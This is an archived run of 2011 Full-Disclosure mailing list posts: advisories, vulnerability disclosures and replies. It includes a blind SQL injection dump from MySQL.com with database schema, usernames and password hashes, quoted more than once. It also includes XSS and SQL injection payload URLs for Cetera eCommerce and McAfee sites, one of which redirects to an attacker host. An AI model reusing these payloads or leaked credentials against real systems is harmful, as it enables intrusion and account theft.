[Full-disclosure] MySQL.com Vulnerable To Blind SQL Injection Vulnerability
--- [+] MySQL.com Vulnerable To Blind SQL Injection vulnerability [+] Author: Jackh4xor @ w4ck1ng [+] Site: http://www.jackh4xor.com --- About MySQL.com : The Mysql website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services and the production support. The wide range of products include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net, visual database tools (query browser, migration toolkit) and last but not least the MaxDB- the open source database certified for SAP/R3. The Mysql services are also made available for you. Choose among the Mysql training for database solutions, Mysql certification for the Developers and DBAs, Mysql consulting and support. It makes no difference if you are new in the database technology or a skilled developer of DBA, Mysql proposes services of all sorts for their customers. Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170 Host IP : 213.136.52.29 Web Server : Apache/2.2.15 (Fedora) Powered-by : PHP/5.2.13 Injection Type: MySQL Blind Current DB : web Data Bases: information_schema bk certification c?ashme cust_sync_interim customer dbasavings downloads feedback glassfish_interface intranet kaj license_customers manual manual_search mem mysql mysqlforge mysqlweb news_events partner_t?aining partners partners_bak phorum5 planetmysql qa_contribution quickpoll robin rp sampo sampo_interface sessions softrax softrax_interim solutions tco test track track_refer wb web web_control web_projects web_training webwiki wordpress zack Current DB: web Tables xing_validation v_web_submissions userbk user_extra user Columns: cwpid version lead_quality sfid industry address2 created last_modified lang notify newsletter gid title fax cell phone country zipcode state city address business company position lastname firstname passwd verified bounces email user_id us_zip_state us_area_state unsub_log trials trial_external_log trial_data trial_alias training_redirect tag_blacklist tag_applied tag support_feeds_DROP support_entries_DROP states snapshots_builds snapshots sakilapoints regions quote_customer quote quicklinks promo product_releases position partner paper_lead paper_details_options paper_details_old paper_details paper newsletter_unsub nav_sites nav_items mysql_history mirror_status mirror_country mirror_continent mirror mailing_list_member mailing_list locks lead_validity_rules lead_source_xref lead_source_external lead_source lead_routing_rule lead_rep lead_old lead_note lead_extra_old lead_extra_new lead_extra lead_companies lead_campaign_member lead language_strings language_modules imagecache hall_of_fame g_search_term g_search_data g_blog_data forum_comment forms field_xref field_options field_match email_blacklist email_a_friend drpl_manual_review drpl_denied drpl_check_log drpl_cache customer_meta_sets customer_meta_set customer_meta customer coupon_product coupon_campaign_attribute coupon_campaign coupon country countries campaign_type campaign_topic campaign_score campaign_listdata campaign_detail business bounces Database : mysql Table: user_info user Column: Update_pri Insert_priv Select_priv Password User Host time_zone_transition_type time_zone_transition time_zone_name time_zone_leap_second time_zone tables_priv slow_log ?ervers procs_priv proc plugin ndb_binlog_index inventory host help_topic help_relation help_keyword help_category general_log func event db columns_priv # mysql.user Data Password UserHost wembaster % monitor 10.% sys % sys localhost *06581D0A5474DFF4D5DA3CE0CD7702FA52601412 forumread % *0702AEBF8E92A002E95D40247776E1A67CD2CA3F wb
[Full-disclosure] [SECURITY] [DSA 2204-1] imp4 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2204-1 secur...@debian.org http://www.debian.org/security/Steffen Joeris March 27, 2011 http://www.debian.org/security/faq - - Package: imp4 Vulnerability : Insufficient input sanitising Problem type : remote Debian-specific: no CVE ID : CVE-2010-3695 Debian Bug : 598584 Moritz Naumann discovered that imp4, a webmail component for the horde framework, is prone to cross-site scripting attacks by a lack of input sanitising of certain fetchmail information. For the oldstable distribution (lenny), this problem has been fixed in version 4.2-4lenny3. For the stable distribution (squeeze), this problem has been fixed in version 4.3.7+debian0-2.1, which was already included in the squeeze release. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 4.3.7+debian0-2.1. We recommend that you upgrade your imp4 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk2PExgACgkQ62zWxYk/rQcijwCgldihmhqvhj/l/aVxjDKSF2es tXUAoJtcseAhsS9CMhJK7VBsH0XW673n =IpN3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS, SQL Injection and SQL DB Structure Extraction vulnerabilities in Cetera eCommerce
Hello list! I want to warn you about Cross-Site Scripting, SQL Injection and SQL DB Structure Extraction vulnerabilities in Cetera eCommerce. It's engine for online shops. - Affected products: - Vulnerable are Cetera eCommerce 14.0 and previous versions. XSS holes also work in Cetera eCommerce 15.0 (which have released in October 2010). -- Details: -- XSS (WASC-08) (also work in version 15.0): http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ http://site/news/1301201030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ XSS (WASC-08): http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ This vulnerability have appeared in version 15.0. Vulnerability takes place at page with error 404, so it'll work as at this URL, as at other URLs, which lead to non-existent pages. SQL Injection (blind SQLi) (WASC-19): http://site/catalog/(version()=5.1)/ http://site/catalog/cart/’+benchmark(10,md5(now()))+’/ SQL DB Structure Extraction (WASC-13): http://site/catalog/%22/ http://site/catalog/cart/’/ Timeline: 2011.01.28 - announced at my site. 2011.01.29 - informed developers. 2011.03.26 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4883/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TSSA-2011-01 xpdf : multiple vulnerabilities allow remote code execution
--- * xpdf : multiple vulnerabilities in t1lib* * allow arbitrary remote code execution * - --- - --[ Vulnerability Summary: Date Published: 28/03/2011 Last Update: 28/03/2011 Advisory ID: TSSA-2011-01 CVE Name: CVE-2011-0764 (previously known as VU#376500) Title: xpdf : multiple vulnerabilities in t1lib Remotely Exploitable: Yes Locally Exploitable: No Impact: Arbitrary code execution Advisory URL: http://www.toucan-system.com/advisories/tssa-2011-01.txt - --[ Introduction: Following 3 paragraphs taken from the vendors' documentation: Xpdf is an open source viewer for Portable Document Format (PDF) files. (These are also sometimes also called 'Acrobat' files, from the name of Adobe's PDF software.) The Xpdf project also includes a PDF text extractor, PDF-to-PostScript converter, and various other utilities. Xpdf runs under the X Window System on UNIX, VMS, and OS/2. The non-X components (pdftops, pdftotext, etc.) also run on Win32 systems and should run on pretty much any system with a decent C++ compiler. Xpdf is designed to be small and efficient. It can use Type 1 or TrueType fonts. - --[ Synopsis: The linux version of xpdf is linked against t1lib, which is vulnerable to multiple vulnerabilities including off by ones, integer overflows and heap corruptions. At least one of those is exploitable and allows arbitrary code to be executed on the target machine when opening a specially crafted pdf file. - --[ Vulnerabilities overview: When parsing specially crafted Type 1 fonts, the t1lib library is subject to several memory corruption vulnerabilities. We will exemplify only a few of them : t1lib being decomissioned by xpdf anyways, it will probably never get fixed. [*] Invalid memory reads (off by few): The following valgrind trace exemplifies an invalid read from t1lib: ==24009== Invalid read of size 8 ==24009==at 0x406364A: ??? (in /usr/lib/libt1.so.5.1.2) ==24009==by 0x4068A0D: ??? (in /usr/lib/libt1.so.5.1.2) ==24009==by 0x4068BEC: ??? (in /usr/lib/libt1.so.5.1.2) ==24009==by 0x4069052: Type1Char (in /usr/lib/libt1.so.5.1.2) ==24009==by 0x40540F3: fontfcnB (in /usr/lib/libt1.so.5.1.2) ==24009==by 0x4077DDC: T1_SetChar (in /usr/lib/libt1.so.5.1.2) ==24009==by 0x407CE88: T1_AASetChar (in /usr/lib/libt1.so.5.1.2) ==24009==by 0x810C95A: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x810BE1E: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80FA588: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80C729F: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x8063A91: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x806452E: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x806224C: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x8062589: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80A690A: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80AB754: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80ACF46: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80E23D6: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80A7BB0: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80EE5B9: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80DEB0F: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x80F1B32: ??? (in /usr/bin/xpdf.bin) ==24009==by 0x458DB55: (below main) (libc-start.c:220) Note: This given vulnerability cannot execute arbitrary code : it only allows a remote denial of service of the xpdf reader. [*] Invalid memory writes: In the same fashion, the following trace exemplifies an invalid memory write, dur to a use after free(): ==23165== Invalid write of size 2 ==23165==at 0x405606C: t1_Bresenham (in /usr/lib/libt1.so.5.1.2) ==23165==by 0x405627E: t1_StepLine (in /usr/lib/libt1.so.5.1.2) ==23165==by 0x405B6E5: t1_Interior (in /usr/lib/libt1.so.5.1.2) ==23165==by 0x405441B: fontfcnB (in /usr/lib/libt1.so.5.1.2) ==23165==by 0x4077DDC: T1_SetChar (in /usr/lib/libt1.so.5.1.2) ==23165==by 0x407CE88: T1_AASetChar (in /usr/lib/libt1.so.5.1.2) ==23165==by 0x810C95A: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x810BE1E: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x80FA588: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x80C729F: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x8063A91: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x806452E: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x806224C: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x8062589: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x80A690A: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x80AB754: ??? (in /usr/bin/xpdf.bin) ==23165==by 0x80ACF46: ??? (in
[Full-disclosure] Vulnerabilities in *McAfee.com
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
#yehg [2011-03-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New Tool - Download Hash Verifier - 56th Tool from SecurityXploded.com
Hi all, We have just released a new tool - Download Hash Verifier - 56th tool from SecurityXploded.com. This is a FREE tool to easily quickly verify the integrity of your downloaded file. For complete details download visit DownloadHashVerifier page below, http://www.securityxploded.com/download-hash-verifier.php With Regards Nagareshwar Talekar http://SecurityXploded.com http://PasswordForensics.com/ http://NetCertScanner.com http://twitter.com/securityxploded ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Vulnerabilities in *McAfee.com
Am I right? Do they offer Verified by McAfee security services but are
too lazy to fix their own shit? If so, LOL :D
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information
leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
#yehg [2011-03-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
On Sun, Mar 27, 2011 at 7:45 PM, n...@myproxylists.com wrote: Vulnerabilities in *McAfee.com Am I right? Do they offer Verified by McAfee security services but are too lazy to fix their own shit? If so, LOL :D Maybe you should grow up you little twerp. Andrew Are you trying to make love with me? No thanks. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL Capable NetCat and more
Beside that, scnc is written in pure-Perl, and is easily modifiable by anyone. Such really simple (dumb?) stuff should not be written in low-level languages such as C. You can't be serious... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL Capable NetCat and more
Okay, and also let me rephrase the question: what does your tool do that * socat* doesn't? On Sat, Mar 26, 2011 at 1:17 PM, GomoR go...@gomor.org wrote: On Sat, Mar 26, 2011 at 08:10:47PM +0200, Anton Ziukin wrote: What can your tool do that Ncat (http://nmap.org/ncat/guide/index.html) can't? Hi, interestingly, I published version 1.00 of scnc in April 2008, the 27th (and it wasn't the first version to be released): http://www.securiteam.com/tools/5RP0O20O0U.html And more interestingly, ncat has been integrated in nmap SVN in May 2008, the 6th: r7360 | mixter | 2008-05-06 22:11:22 +0200 (Tue, 06 May 2008) | 1 line Initial commit of ncat, as of current sourceforge.net HEAD CVS Considering this timeline, pardon me if I fix bugs found in my softwares, even when some other tools give the same features. Beside that, scnc is written in pure-Perl, and is easily modifiable by anyone. Such really simple (dumb?) stuff should not be written in low-level languages such as C. Regards, -- ^ ___ ___ http://www.GomoR.org/ -+ | / __ |__/Senior Security Engineer | | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]---| +-- Net::Frame = http://search.cpan.org/~gomor/ ---+ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL.com Vulnerable To Blind SQL Injection Vulnerability
lmao. Was this accomplished using standard pattern from sqlmap, or did you make your own? On Sun, Mar 27, 2011 at 6:46 AM, Jack haxor jackh4...@h4cky0u.org wrote: --- [+] MySQL.com Vulnerable To Blind SQL Injection vulnerability [+] Author: Jackh4xor @ w4ck1ng [+] Site: http://www.jackh4xor.com --- About MySQL.com : The Mysql website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services and the production support. The wide range of products include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net, visual database tools (query browser, migration toolkit) and last but not least the MaxDB- the open source database certified for SAP/R3. The Mysql services are also made available for you. Choose among the Mysql training for database solutions, Mysql certification for the Developers and DBAs, Mysql consulting and support. It makes no difference if you are new in the database technology or a skilled developer of DBA, Mysql proposes services of all sorts for their customers. Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170 Host IP : 213.136.52.29 Web Server : Apache/2.2.15 (Fedora) Powered-by : PHP/5.2.13 Injection Type: MySQL Blind Current DB : web Data Bases: information_schema bk certification c?ashme cust_sync_interim customer dbasavings downloads feedback glassfish_interface intranet kaj license_customers manual manual_search mem mysql mysqlforge mysqlweb news_events partner_t?aining partners partners_bak phorum5 planetmysql qa_contribution quickpoll robin rp sampo sampo_interface sessions softrax softrax_interim solutions tco test track track_refer wb web web_control web_projects web_training webwiki wordpress zack Current DB: web Tables xing_validation v_web_submissions userbk user_extra user Columns: cwpid version lead_quality sfid industry address2 created last_modified lang notify newsletter gid title fax cell phone country zipcode state city address business company position lastname firstname passwd verified bounces email user_id us_zip_state us_area_state unsub_log trials trial_external_log trial_data trial_alias training_redirect tag_blacklist tag_applied tag support_feeds_DROP support_entries_DROP states snapshots_builds snapshots sakilapoints regions quote_customer quote quicklinks promo product_releases position partner paper_lead paper_details_options paper_details_old paper_details paper newsletter_unsub nav_sites nav_items mysql_history mirror_status mirror_country mirror_continent mirror mailing_list_member mailing_list locks lead_validity_rules lead_source_xref lead_source_external lead_source lead_routing_rule lead_rep lead_old lead_note lead_extra_old lead_extra_new lead_extra lead_companies lead_campaign_member lead language_strings language_modules imagecache hall_of_fame g_search_term g_search_data g_blog_data forum_comment forms field_xref field_options field_match email_blacklist email_a_friend drpl_manual_review drpl_denied drpl_check_log drpl_cache customer_meta_sets customer_meta_set customer_meta customer coupon_product coupon_campaign_attribute coupon_campaign coupon country countries campaign_type campaign_topic campaign_score campaign_listdata campaign_detail business bounces Database : mysql Table: user_info user Column: Update_pri Insert_priv Select_priv Password User Host time_zone_transition_type time_zone_transition time_zone_name time_zone_leap_second time_zone tables_priv slow_log ?ervers procs_priv proc plugin ndb_binlog_index inventory host help_topic help_relation help_keyword help_category general_log func event db columns_priv # mysql.user Data Password UserHost wembaster % monitor 10.% sys % sys localhost *06581D0A5474DFF4D5DA3CE0CD7702FA52601412 forumread % *0702AEBF8E92A002E95D40247776E1A67CD2CA3F wb % *2A57F767D29295B3CB8D01C760D9939649483F85 flipper 10.% *32F623705BFFFE682E7BD18D5357B38EF8A5BAA9 wordpress %
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
GROUP HUG! On Sun, Mar 27, 2011 at 9:02 PM, n...@myproxylists.com wrote: On Sun, Mar 27, 2011 at 7:45 PM, n...@myproxylists.com wrote: Vulnerabilities in *McAfee.com Am I right? Do they offer Verified by McAfee security services but are too lazy to fix their own shit? If so, LOL :D Maybe you should grow up you little twerp. Andrew Are you trying to make love with me? No thanks. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL.com Vulnerable To Blind SQL Injection Vulnerability
pangolin or havij? lol On Sun, Mar 27, 2011 at 8:54 AM, Cal Leeming c...@foxwhisper.co.uk wrote: lmao. Was this accomplished using standard pattern from sqlmap, or did you make your own? On Sun, Mar 27, 2011 at 6:46 AM, Jack haxor jackh4...@h4cky0u.org wrote: --- [+] MySQL.com Vulnerable To Blind SQL Injection vulnerability [+] Author: Jackh4xor @ w4ck1ng [+] Site: http://www.jackh4xor.com --- About MySQL.com : The Mysql website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services and the production support. The wide range of products include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net, visual database tools (query browser, migration toolkit) and last but not least the MaxDB- the open source database certified for SAP/R3. The Mysql services are also made available for you. Choose among the Mysql training for database solutions, Mysql certification for the Developers and DBAs, Mysql consulting and support. It makes no difference if you are new in the database technology or a skilled developer of DBA, Mysql proposes services of all sorts for their customers. Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170 Host IP : 213.136.52.29 Web Server : Apache/2.2.15 (Fedora) Powered-by : PHP/5.2.13 Injection Type: MySQL Blind Current DB : web Data Bases: information_schema bk certification c?ashme cust_sync_interim customer dbasavings downloads feedback glassfish_interface intranet kaj license_customers manual manual_search mem mysql mysqlforge mysqlweb news_events partner_t?aining partners partners_bak phorum5 planetmysql qa_contribution quickpoll robin rp sampo sampo_interface sessions softrax softrax_interim solutions tco test track track_refer wb web web_control web_projects web_training webwiki wordpress zack Current DB: web Tables xing_validation v_web_submissions userbk user_extra user Columns: cwpid version lead_quality sfid industry address2 created last_modified lang notify newsletter gid title fax cell phone country zipcode state city address business company position lastname firstname passwd verified bounces email user_id us_zip_state us_area_state unsub_log trials trial_external_log trial_data trial_alias training_redirect tag_blacklist tag_applied tag support_feeds_DROP support_entries_DROP states snapshots_builds snapshots sakilapoints regions quote_customer quote quicklinks promo product_releases position partner paper_lead paper_details_options paper_details_old paper_details paper newsletter_unsub nav_sites nav_items mysql_history mirror_status mirror_country mirror_continent mirror mailing_list_member mailing_list locks lead_validity_rules lead_source_xref lead_source_external lead_source lead_routing_rule lead_rep lead_old lead_note lead_extra_old lead_extra_new lead_extra lead_companies lead_campaign_member lead language_strings language_modules imagecache hall_of_fame g_search_term g_search_data g_blog_data forum_comment forms field_xref field_options field_match email_blacklist email_a_friend drpl_manual_review drpl_denied drpl_check_log drpl_cache customer_meta_sets customer_meta_set customer_meta customer coupon_product coupon_campaign_attribute coupon_campaign coupon country countries campaign_type campaign_topic campaign_score campaign_listdata campaign_detail business bounces Database : mysql Table: user_info user Column: Update_pri Insert_priv Select_priv Password User Host time_zone_transition_type time_zone_transition time_zone_name time_zone_leap_second time_zone tables_priv slow_log ?ervers procs_priv proc plugin ndb_binlog_index inventory host help_topic help_relation help_keyword help_category general_log func event db columns_priv # mysql.user Data Password UserHost wembaster % monitor 10.% sys % sys localhost *06581D0A5474DFF4D5DA3CE0CD7702FA52601412 forumread % *0702AEBF8E92A002E95D40247776E1A67CD2CA3F wb % *2A57F767D29295B3CB8D01C760D9939649483F85 flipper
[Full-disclosure] [ MDVSA-2011:054 ] java-1.6.0-openjdk
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:054 http://www.mandriva.com/security/ ___ Package : java-1.6.0-openjdk Date: March 27, 2011 Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been identified and fixed in java-1.6.0-openjdk: The JNLP SecurityManager in IcedTea (IcedTea.so) 1.7 before 1.7.7, 1.8 before 1.8.4, and 1.9 before 1.9.4 for Java OpenJDK returns from the checkPermission method instead of throwing an exception in certain circumstances, which might allow context-dependent attackers to bypass the intended security policy by creating instances of ClassLoader (CVE-2010-4351). Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to Networking. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue involves DNS cache poisoning by untrusted applets. (CVE-2010-4448) Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Solaris and Linux; 5.0 Update 27 and earlier for Solaris and Linux; and 1.4.2_29 and earlier for Solaris and Linux allows local standalone applications to affect confidentiality, integrity, and availability via unknown vectors related to Launcher. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is an untrusted search path vulnerability involving an empty LD_LIBRARY_PATH environment variable (CVE-2010-4450). Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is related to the lack of framework support by AWT event dispatch, and/or clipboard access in Applets. (CVE-2010-4465) Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is heap corruption related to the Verifier and backward jsrs. (CVE-2010-4469) Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23, and, and earlier allows remote attackers to affect availability via unknown vectors related to JAXP and unspecified APIs. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is related to Features set on SchemaFactory not inherited by Validator. (CVE-2010-4470) Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, and 5.0 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to 2D. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is related to the exposure of system properties via vectors related to Font.createFont and exception text (CVE-2010-4471). Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier allows remote attackers to affect availability, related to XML Digital Signature and unspecified APIs. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue involves the replacement of the XML DSig Transform or C14N algorithm implementations. (CVE-2010-4472) The Double.parseDouble method in Java Runtime
Re: [Full-disclosure] Materials regarding Cyber-war
